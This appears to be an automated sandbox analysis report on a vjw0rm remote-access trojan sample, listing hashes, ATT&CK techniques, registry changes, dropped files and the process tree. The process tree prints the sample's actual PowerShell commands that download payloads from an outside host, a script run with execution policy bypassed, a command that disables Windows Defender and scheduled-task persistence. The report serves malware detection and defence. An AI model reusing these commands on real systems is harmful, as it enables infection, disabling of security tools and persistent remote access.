vjw0rm | 22f93b97e4ee74c1af48cbdcf878a983cbe2fba7eefc5cd639814dc942cbaa8d

Analysis

max time kernel
135s
max time network
113s
platform
windows10_x64
resource
win10v20210410
submitted
29-06-2021 19:16

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

22F93B97E4EE74C1AF48CBDCF878A983CBE2FBA7EEFC5.exe
Size

3.1MB
MD5

52bbd67fdb23378f2ad43efb150abdc4
SHA1

9d138f1bf129473cb0d74c0d94ec8af2daa311c7
SHA256

22f93b97e4ee74c1af48cbdcf878a983cbe2fba7eefc5cd639814dc942cbaa8d
SHA512

7cf115c532466de78abd369ba202f738a3520f7c2b87c4847a8d8e59dc6e2c0d7cd9da1995d019690edd92b3ed154a9d659b7a6932c091e9c042192a66049755

Score

10^/10

vjw0rm evasion persistence trojan worm

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://gamecardsy.com/ahmadtestupl/DefenderControl.exe

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://gamecardsy.com/ahmadtestupl/DefenderKill.txt

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://gamecardsy.com/ahmadtestupl/Defender.bat

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://gamecardsy.com/ahmadtestupl/ff.ps1

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://gamecardsy.com/ahmadtestupl/DefenderControl.txt

Signatures

Modifies security service 2 TTPs 1 IoCs
evasion

Modify Registry
T1112

Modify Existing Service
T1031

Processes:

Setup.exe

description ioc process

Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Start = "4" Setup.exe
Vjw0rm
Vjw0rm is a remote access trojan written in JavaScript.
trojan worm vjw0rm
Blocklisted process makes network request 5 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

flow pid process

12 4028 powershell.exe
13 2424 powershell.exe
14 2896 powershell.exe
16 936 powershell.exe
17 2116 powershell.exe
Downloads MZ/PE file
Executes dropped EXE 6 IoCs

Processes:

Setup.exeDefenderControl.exeDefenderControl.execonhostHost.execonhost.execonhost.exe

pid process

1636 Setup.exe
1156 DefenderControl.exe
3900 DefenderControl.exe
580 conhostHost.exe
2764 conhost.exe
1808 conhost.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Start = "4"	Setup.exe

flow	pid	process
12	4028	powershell.exe
13	2424	powershell.exe
14	2896	powershell.exe
16	936	powershell.exe
17	2116	powershell.exe

pid	process
1636	Setup.exe
1156	DefenderControl.exe
3900	DefenderControl.exe
580	conhostHost.exe
2764	conhost.exe
1808	conhost.exe

Drops startup file 4 IoCs

Processes:

conhost.execonhost.execonhostHost.exe

description	ioc	process
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\conhost.exe	conhost.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\conhost.exe	conhost.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\conhost.exe.manifest	conhostHost.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\conhost.exe	conhost.exe

Windows security modification 2 TTPs 1 IoCs
evasion trojan

Disabling Security Tools
T1089

Modify Registry
T1112

Processes:

DefenderControl.exe

description ioc process

Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection DefenderControl.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection	DefenderControl.exe

Adds Run key to start application 2 TTPs 4 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

conhost.execonhost.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Windows\CurrentVersion\Run\QYG44E4BTK = "\"C:\\ProgramData\\conhost.exe\""	conhost.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Windows\CurrentVersion\Run	conhost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Windows\CurrentVersion\Run\QYG44E4BTK = "\"C:\\ProgramData\\conhost.exe\""	conhost.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Windows\CurrentVersion\Run	conhost.exe

Drops file in System32 directory 2 IoCs

Processes:

DefenderControl.exe

description	ioc	process
File opened for modification	C:\Windows\System32\GroupPolicy\gpt.ini	DefenderControl.exe
File created	C:\Windows\System32\GroupPolicy\Machine\Registry.pol	DefenderControl.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exe

pid process

3676 schtasks.exe
2920 schtasks.exe

pid	process
3676	schtasks.exe
2920	schtasks.exe

Modifies system certificate store 2 TTPs 3 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

Processes:

conhost.exe

description	ioc	process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = 5c000000010000000400000000080000190000000100000010000000d0fd3c9c380d7b65e26b9a3fedd39b8f030000000100000014000000d69b561148f01c77c54578c10926df5b856976ad1d000000010000001000000001728e1ecf7a9d86fb3cec8948aba9531400000001000000140000008ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc620000000100000020000000cbb522d7b7f127ad6a0113865bdf1cd4102e7d0759af635a7cf4720dc963c53b0b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520033000000530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000200000005229ba15b31b0c6f4cca89c2985177974327d1b689a3b935a0bd975532af22ab040000000100000010000000c5dfb849ca051355ee2dba1ac33eb0282000000001000000630300003082035f30820247a003020102020b04000000000121585308a2300d06092a864886f70d01010b0500304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e301e170d3039303331383130303030305a170d3239303331383130303030305a304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e30820122300d06092a864886f70d01010105000382010f003082010a0282010100cc2576907906782216f5c083b684ca289efd057611c5ad8872fc460243c7b28a9d045f24cb2e4be1608246e152ab0c8147706cdd64d1ebf52ca30f823d0c2bae97d7b614861079bb3b1380778c08e149d26a622f1f5efa9668df892795389f06d73ec9cb26590d73deb0c8e9260e8315c6ef5b8bd20460ca49a628f6693bf6cbc82891e59d8a615737ac7414dc74e03aee722f2e9cfbd0bbbff53d00e10633e8822bae53a63a16738cdd410e203ac0b4a7a1e9b24f902e3260e957cbb904926868e538266075b29f77ff9114efae2049fcad401548d1023161195eb897efad77b7649a7abf5fc113ef9b62fb0d6ce0546916a903da6ee983937176c6698582170203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e041604148ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc300d06092a864886f70d01010b050003820101004b40dbc050aafec80ceff796544549bb96000941acb3138686280733ca6be674b9ba002daea40ad3f5f1f10f8abf73674a83c7447b78e0af6e6c6f03298e333945c38ee4b9576caafc1296ec53c62de4246cb99463fbdc536867563e83b8cf3521c3c968fecedac253aacc908ae9f05d468c95dd7a58281a2f1ddecd0037418fed446dd75328977ef367041e15d78a96b4d3de4c27a44c1b737376f41799c21f7a0ee32d08ad0a1c2cff3cab550e0f917e36ebc35749bee12e2d7c608bc3415113239dcef7326b9401a899e72c331f3a3b25d28640ce3b2c8678c9612f14baeedb556fdf84ee05094dbd28d872ced36250651eeb92978331d9b3b5ca47583f5f	conhost.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD	conhost.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = 040000000100000010000000c5dfb849ca051355ee2dba1ac33eb0280f00000001000000200000005229ba15b31b0c6f4cca89c2985177974327d1b689a3b935a0bd975532af22ab090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b06010505070308530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520033000000620000000100000020000000cbb522d7b7f127ad6a0113865bdf1cd4102e7d0759af635a7cf4720dc963c53b1400000001000000140000008ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc1d000000010000001000000001728e1ecf7a9d86fb3cec8948aba953030000000100000014000000d69b561148f01c77c54578c10926df5b856976ad190000000100000010000000d0fd3c9c380d7b65e26b9a3fedd39b8f2000000001000000630300003082035f30820247a003020102020b04000000000121585308a2300d06092a864886f70d01010b0500304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e301e170d3039303331383130303030305a170d3239303331383130303030305a304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e30820122300d06092a864886f70d01010105000382010f003082010a0282010100cc2576907906782216f5c083b684ca289efd057611c5ad8872fc460243c7b28a9d045f24cb2e4be1608246e152ab0c8147706cdd64d1ebf52ca30f823d0c2bae97d7b614861079bb3b1380778c08e149d26a622f1f5efa9668df892795389f06d73ec9cb26590d73deb0c8e9260e8315c6ef5b8bd20460ca49a628f6693bf6cbc82891e59d8a615737ac7414dc74e03aee722f2e9cfbd0bbbff53d00e10633e8822bae53a63a16738cdd410e203ac0b4a7a1e9b24f902e3260e957cbb904926868e538266075b29f77ff9114efae2049fcad401548d1023161195eb897efad77b7649a7abf5fc113ef9b62fb0d6ce0546916a903da6ee983937176c6698582170203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e041604148ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc300d06092a864886f70d01010b050003820101004b40dbc050aafec80ceff796544549bb96000941acb3138686280733ca6be674b9ba002daea40ad3f5f1f10f8abf73674a83c7447b78e0af6e6c6f03298e333945c38ee4b9576caafc1296ec53c62de4246cb99463fbdc536867563e83b8cf3521c3c968fecedac253aacc908ae9f05d468c95dd7a58281a2f1ddecd0037418fed446dd75328977ef367041e15d78a96b4d3de4c27a44c1b737376f41799c21f7a0ee32d08ad0a1c2cff3cab550e0f917e36ebc35749bee12e2d7c608bc3415113239dcef7326b9401a899e72c331f3a3b25d28640ce3b2c8678c9612f14baeedb556fdf84ee05094dbd28d872ced36250651eeb92978331d9b3b5ca47583f5f	conhost.exe

Suspicious behavior: EnumeratesProcesses 22 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exeDefenderControl.exe

pid	process
4028	powershell.exe
4028	powershell.exe
4028	powershell.exe
2424	powershell.exe
2424	powershell.exe
2424	powershell.exe
2896	powershell.exe
2896	powershell.exe
2896	powershell.exe
936	powershell.exe
936	powershell.exe
936	powershell.exe
2116	powershell.exe
2116	powershell.exe
2116	powershell.exe
1508	powershell.exe
1508	powershell.exe
1508	powershell.exe
1156	DefenderControl.exe
1156	DefenderControl.exe
1156	DefenderControl.exe
1156	DefenderControl.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

Setup.exe

pid process

1636 Setup.exe

pid	process
1636	Setup.exe

Suspicious use of AdjustPrivilegeToken 6 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	4028	powershell.exe
Token: SeDebugPrivilege	2424	powershell.exe
Token: SeDebugPrivilege	2896	powershell.exe
Token: SeDebugPrivilege	936	powershell.exe
Token: SeDebugPrivilege	2116	powershell.exe
Token: SeDebugPrivilege	1508	powershell.exe

Suspicious use of FindShellTrayWindow 7 IoCs

Processes:

22F93B97E4EE74C1AF48CBDCF878A983CBE2FBA7EEFC5.exeDefenderControl.execonhostHost.exe

pid	process
3896	22F93B97E4EE74C1AF48CBDCF878A983CBE2FBA7EEFC5.exe
1156	DefenderControl.exe
1156	DefenderControl.exe
1156	DefenderControl.exe
3896	22F93B97E4EE74C1AF48CBDCF878A983CBE2FBA7EEFC5.exe
580	conhostHost.exe
580	conhostHost.exe

Suspicious use of SendNotifyMessage 4 IoCs

Processes:

22F93B97E4EE74C1AF48CBDCF878A983CBE2FBA7EEFC5.execonhostHost.exe

pid	process
3896	22F93B97E4EE74C1AF48CBDCF878A983CBE2FBA7EEFC5.exe
3896	22F93B97E4EE74C1AF48CBDCF878A983CBE2FBA7EEFC5.exe
580	conhostHost.exe
580	conhostHost.exe

Suspicious use of WriteProcessMemory 42 IoCs

Processes:

22F93B97E4EE74C1AF48CBDCF878A983CBE2FBA7EEFC5.execmd.exepowershell.execmd.execonhostHost.execonhost.execonhost.exe

description	pid	process	target process
PID 3896 wrote to memory of 1636	3896	22F93B97E4EE74C1AF48CBDCF878A983CBE2FBA7EEFC5.exe	Setup.exe
PID 3896 wrote to memory of 1636	3896	22F93B97E4EE74C1AF48CBDCF878A983CBE2FBA7EEFC5.exe	Setup.exe
PID 3896 wrote to memory of 1636	3896	22F93B97E4EE74C1AF48CBDCF878A983CBE2FBA7EEFC5.exe	Setup.exe
PID 3896 wrote to memory of 2880	3896	22F93B97E4EE74C1AF48CBDCF878A983CBE2FBA7EEFC5.exe	cmd.exe
PID 3896 wrote to memory of 2880	3896	22F93B97E4EE74C1AF48CBDCF878A983CBE2FBA7EEFC5.exe	cmd.exe
PID 3896 wrote to memory of 2880	3896	22F93B97E4EE74C1AF48CBDCF878A983CBE2FBA7EEFC5.exe	cmd.exe
PID 2880 wrote to memory of 4028	2880	cmd.exe	powershell.exe
PID 2880 wrote to memory of 4028	2880	cmd.exe	powershell.exe
PID 2880 wrote to memory of 4028	2880	cmd.exe	powershell.exe
PID 2880 wrote to memory of 2424	2880	cmd.exe	powershell.exe
PID 2880 wrote to memory of 2424	2880	cmd.exe	powershell.exe
PID 2880 wrote to memory of 2424	2880	cmd.exe	powershell.exe
PID 2880 wrote to memory of 2896	2880	cmd.exe	powershell.exe
PID 2880 wrote to memory of 2896	2880	cmd.exe	powershell.exe
PID 2880 wrote to memory of 2896	2880	cmd.exe	powershell.exe
PID 2880 wrote to memory of 936	2880	cmd.exe	powershell.exe
PID 2880 wrote to memory of 936	2880	cmd.exe	powershell.exe
PID 2880 wrote to memory of 936	2880	cmd.exe	powershell.exe
PID 2880 wrote to memory of 2116	2880	cmd.exe	powershell.exe
PID 2880 wrote to memory of 2116	2880	cmd.exe	powershell.exe
PID 2880 wrote to memory of 2116	2880	cmd.exe	powershell.exe
PID 2880 wrote to memory of 1508	2880	cmd.exe	powershell.exe
PID 2880 wrote to memory of 1508	2880	cmd.exe	powershell.exe
PID 2880 wrote to memory of 1508	2880	cmd.exe	powershell.exe
PID 1508 wrote to memory of 2128	1508	powershell.exe	cmd.exe
PID 1508 wrote to memory of 2128	1508	powershell.exe	cmd.exe
PID 1508 wrote to memory of 2128	1508	powershell.exe	cmd.exe
PID 2128 wrote to memory of 1156	2128	cmd.exe	DefenderControl.exe
PID 2128 wrote to memory of 1156	2128	cmd.exe	DefenderControl.exe
PID 2128 wrote to memory of 1156	2128	cmd.exe	DefenderControl.exe
PID 2128 wrote to memory of 3900	2128	cmd.exe	DefenderControl.exe
PID 2128 wrote to memory of 3900	2128	cmd.exe	DefenderControl.exe
PID 2128 wrote to memory of 3900	2128	cmd.exe	DefenderControl.exe
PID 3896 wrote to memory of 580	3896	22F93B97E4EE74C1AF48CBDCF878A983CBE2FBA7EEFC5.exe	conhostHost.exe
PID 3896 wrote to memory of 580	3896	22F93B97E4EE74C1AF48CBDCF878A983CBE2FBA7EEFC5.exe	conhostHost.exe
PID 580 wrote to memory of 2764	580	conhostHost.exe	conhost.exe
PID 580 wrote to memory of 2764	580	conhostHost.exe	conhost.exe
PID 580 wrote to memory of 2764	580	conhostHost.exe	conhost.exe
PID 2764 wrote to memory of 3676	2764	conhost.exe	schtasks.exe
PID 2764 wrote to memory of 3676	2764	conhost.exe	schtasks.exe
PID 1808 wrote to memory of 2920	1808	conhost.exe	schtasks.exe
PID 1808 wrote to memory of 2920	1808	conhost.exe	schtasks.exe

C:\Users\Admin\AppData\Local\Temp\22F93B97E4EE74C1AF48CBDCF878A983CBE2FBA7EEFC5.exe
"C:\Users\Admin\AppData\Local\Temp\22F93B97E4EE74C1AF48CBDCF878A983CBE2FBA7EEFC5.exe"
1⤵
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3896

C:\ProgramData\Setup.exe
C:\ProgramData\Setup.exe
2⤵
- Modifies security service
- Executes dropped EXE
- Suspicious behavior: GetForegroundWindowSpam
PID:1636

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\ProgramData\start.bat" "
2⤵
- Suspicious use of WriteProcessMemory
PID:2880

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -command "& { (New-Object Net.WebClient).DownloadFile('http://gamecardsy.com/ahmadtestupl/DefenderControl.exe', 'C:\Users\Public\DefenderControl.exe') }"
3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4028

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -command "& { (New-Object Net.WebClient).DownloadFile('http://gamecardsy.com/ahmadtestupl/DefenderKill.txt', 'C:\Users\Public\DefenderKill.lnk') }"
3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2424

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -command "& { (New-Object Net.WebClient).DownloadFile('http://gamecardsy.com/ahmadtestupl/Defender.bat', 'C:\Users\Public\Defender.bat') }"
3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2896

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -command "& { (New-Object Net.WebClient).DownloadFile('http://gamecardsy.com/ahmadtestupl/ff.ps1', 'C:\Users\Public\ff.ps1') }"
3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:936

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -command "& { (New-Object Net.WebClient).DownloadFile('http://gamecardsy.com/ahmadtestupl/DefenderControl.txt', 'C:\Users\Public\DefenderControl.ini') }"
3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2116

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -ExecutionPolicy Bypass -File C:\Users\Public\ff.ps1
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1508

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Defender.bat" "
4⤵
- Suspicious use of WriteProcessMemory
PID:2128

C:\Users\Public\DefenderControl.exe
DefenderControl.exe /D
5⤵
- Executes dropped EXE
- Windows security modification
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
PID:1156

C:\Users\Public\DefenderControl.exe
DefenderControl.exe /Q
5⤵
- Executes dropped EXE
PID:3900

C:\ProgramData\conhostHost.exe
C:\ProgramData\conhostHost.exe
2⤵
- Executes dropped EXE
- Drops startup file
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:580

C:\ProgramData\conhost.exe
C:\ProgramData/conhost.exe
3⤵
- Executes dropped EXE
- Drops startup file
- Adds Run key to start application
- Modifies system certificate store
- Suspicious use of WriteProcessMemory
PID:2764

C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /sc minute /mo 1 /tn Skype /tr "C:\ProgramData\conhost.exe
4⤵
- Creates scheduled task(s)
PID:3676

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
1⤵
PID:1928

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
1⤵
PID:3172

\??\c:\windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:3884

C:\ProgramData\conhost.exe
C:\ProgramData\conhost.exe
1⤵
- Executes dropped EXE
- Drops startup file
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:1808

C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /sc minute /mo 1 /tn Skype /tr "C:\ProgramData\conhost.exe
2⤵
- Creates scheduled task(s)
PID:2920

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Modify Registry

T1112

Disabling Security Tools

T1089

Install Root Certificate

T1130

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Setup.exe
MD5
1d3072caa9c82faea4ce0aff3c267d5f

SHA1
45431656c6d6e841c40bc8e80bed891193caff21

SHA256
48efc1e775c88e01600b049e1e55831fefaea5d624d94892a6efaa632181e2fe

SHA512
9d26e856ace8d48382d16346bff089439f7263b2c3f9c4dbc2cd8a797a704ab2d447df0e303b4a40cead274d0871aec1819ee81c40697efb7c759cae27ff76f5

Download Submit
C:\ProgramData\Setup.exe
MD5
1d3072caa9c82faea4ce0aff3c267d5f

SHA1
45431656c6d6e841c40bc8e80bed891193caff21

SHA256
48efc1e775c88e01600b049e1e55831fefaea5d624d94892a6efaa632181e2fe

SHA512
9d26e856ace8d48382d16346bff089439f7263b2c3f9c4dbc2cd8a797a704ab2d447df0e303b4a40cead274d0871aec1819ee81c40697efb7c759cae27ff76f5

Download Submit
C:\ProgramData\conhost.exe
MD5
fdbd7b1910d980cf7273796a0119d252

SHA1
47029af064a51454662909465ce38ee5cdcc62c7

SHA256
3e1da2d14de49132c42e8a4ddceb5efd36e066523affcc47de6d175316ab0f4e

SHA512
ab43e5ba29134c62a8beb000657f83b9471a64a839d3462c9625d059b5e259a75cdd27b2536150ae40931478384f6c13ef777756391cbe4cd9d95de35b581170

Download Submit
C:\ProgramData\conhost.exe
MD5
fdbd7b1910d980cf7273796a0119d252

SHA1
47029af064a51454662909465ce38ee5cdcc62c7

SHA256
3e1da2d14de49132c42e8a4ddceb5efd36e066523affcc47de6d175316ab0f4e

SHA512
ab43e5ba29134c62a8beb000657f83b9471a64a839d3462c9625d059b5e259a75cdd27b2536150ae40931478384f6c13ef777756391cbe4cd9d95de35b581170

Download Submit
C:\ProgramData\conhost.exe
MD5
fdbd7b1910d980cf7273796a0119d252

SHA1
47029af064a51454662909465ce38ee5cdcc62c7

SHA256
3e1da2d14de49132c42e8a4ddceb5efd36e066523affcc47de6d175316ab0f4e

SHA512
ab43e5ba29134c62a8beb000657f83b9471a64a839d3462c9625d059b5e259a75cdd27b2536150ae40931478384f6c13ef777756391cbe4cd9d95de35b581170

Download Submit
C:\ProgramData\conhost.exe.manifest
MD5
c52800b49b2392de3d171515d13b8dd2

SHA1
9c59962bb6dbf5317c2684ed542c1c12a7778747

SHA256
830bab8f10c1bd63d50e40e0137d9f26eac59fb8c4c4c53840c674e4793fcb66

SHA512
c36c8f8080d617e058c2325fb7515059c6a5c1eb97e8c76440f44a8c1889d6616d2b8c92ac2d8b1e1754409912722d941aaeb4cb28eda1df08c148ed3497559a

Download Submit
C:\ProgramData\conhostHost.exe
MD5
0556e409646df2fac47ab802d946c040

SHA1
a1c3717b3dd3ae7def30e9b8bb6dc92979b57de9

SHA256
7c46e3309671f2c70dc1c78b8bbeb132684d9f0014b6c4671e1d12cc75f8cd89

SHA512
60b6659b24949c20b32bc7e1b7e3a40bde4d5b0b354e55ea1aeadab05be448b89e1df3d094c01aaf008c93dec91d168193e77a63e6a26189341441905bb09596

Download Submit
C:\ProgramData\start.bat
MD5
25768ca0dbfdaafacf64ec31c72ab131

SHA1
0c06ddcc9592a62f76589dfd51e29558ade3db23

SHA256
dbb2aa62e7815bec646a0e160b658479040966edb3832c95e2647b0f3053df17

SHA512
6dbfb8b3beddf8c788d5d2d0d1cdf754a5892a787192f3d0461ec277eefa849db0d26c17595c8d006d576f969d05e57022420c8f5a15d09e2306228579e70182

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
MD5
66382a4ca6c4dcf75ce41417d44be93e

SHA1
8132cbef1c12f8a89a68a6153ade4286bf130812

SHA256
a70acce0f4c6ab59b88ce79d84c38d4abffe19b72b033250499b17d788a2db56

SHA512
2bf66f2850f4a65220085c55a5b3c8866453104d78fe516e5bd6e3e47df783062ce4ea10de580f2eb0274ac8c3ce71965201c49ef55a78f307731ccc8600aadc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
d57eefc7c5517d8b84fa7415aa6b1515

SHA1
f6584e65cd90a408b0c6399fc284ea30ef6e3487

SHA256
65f237d929afeff7fbddaa863ac0899815584bc24cea4144200c41ddb66a7aec

SHA512
350791f6d10297566fa4e6709a0a02545e2b9d1f582ae57e3f31103d28dbbf8f135cde92919bb45455135d504a27789ec4235ef402c8adb3d7f4b39f60f60f2b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
51a950a2dd7c7e0069f303c1b45eb463

SHA1
ee5daa8db59b3ad9270916de39f142d3d4fffe50

SHA256
b48dc7ab9429c7dd46da3b0f64c569491e974b9cb1b870fbe9eca9614eb0b138

SHA512
cdc9687ecd162c2180ba4f181b79646abfd8a0cb492cc7acbb9165f837b3d3a9afcb63aff5c09160f965c58db2c9c7005bbbb2b038700d2a3514494cde33016a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
ea53a598ed0fe9e00468cb8f3a4fe462

SHA1
fc7fb895cbe58ab8619d3284a63fa6d3347abd91

SHA256
2aa53d33c287fe8f9d6660fd9bfd5f4d17af552f400585e1580f58d1960a4026

SHA512
8055f324644e0cf8fd40c3b3861dddb974f72eadda92583319ee394b04600014a934fa208e57d45a5b6d20a5321e2ca03c28859f4306d7f8e115a942c4138be7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
7bd3d46401369210307b29ee92c54cef

SHA1
296ef2c433e37342b144e792fa4dc13d4f372fbd

SHA256
0499553160af732fcb0929de8984d710eaf70af0264bb53bc04d1b2c1811bab7

SHA512
1f0977cef40e586556c29f2b9dad0fb60a4de15851a807a0a885022e479afd0a0429316ce126d7413bd5b8d7b23b91bb9b0edb3f90e77079fd05d3f09b36d333

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
3135feea2fdbd078fbf7f6741139474b

SHA1
0893a6fb076dce16a148a640b2e80802d96114f3

SHA256
56e363204c35adefe9acee542ca824fdfba481f907cf48bc53c43d1cf7048414

SHA512
ec9e3404914f03e224c76c7209ce0118eec80c7207386aa5f68d3e1bf5e535d8f3cf31a808fd0957a893264edf850c696e91f12a5458172b0ffb421e19abdb66

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\conhost.exe
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
C:\Users\Public\Defender.bat
MD5
6e18e46e1925e47c36dd5c936abc9ae7

SHA1
eaaff27bde9261cd3ebaf569cf0f2566a2269464

SHA256
989b2c6f7dab1f36a2c21fbc165fa73e6e5aa22a35c63aedfc41727fe5cfcd1e

SHA512
de94f9f41e74c9b52265ab3d79c20df89ec946a9ab56ac5dcc3b5d5bca7bec5ac8eae506b3da6c592daeae6d3569e78c678bd52739e493f5490a65372157c0c1

Download Submit
